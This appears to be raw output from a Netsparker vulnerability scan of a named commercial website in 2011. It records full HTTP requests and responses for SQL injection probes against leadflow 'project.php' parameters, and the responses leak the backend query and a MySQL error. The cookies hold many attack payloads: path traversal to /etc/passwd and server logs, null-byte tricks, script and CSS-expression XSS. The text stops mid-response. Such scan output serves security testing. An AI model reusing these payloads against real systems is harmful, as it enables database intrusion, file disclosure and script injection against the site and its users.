P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=j836bi4plnuj9pbmbo7iu0clq5; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/parl00/project.php

/ppc/leadflow/parl00/project.php

http://www.insideup.com/ppc/leadflow/parl00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/parl00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=6hr2g3rud7uupus7m31485c9g3; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/bulo00/project.php

/ppc/leadflow/bulo00/project.php

http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 30005
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=n5hg8lkmiscark5lpoeuadar45; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL 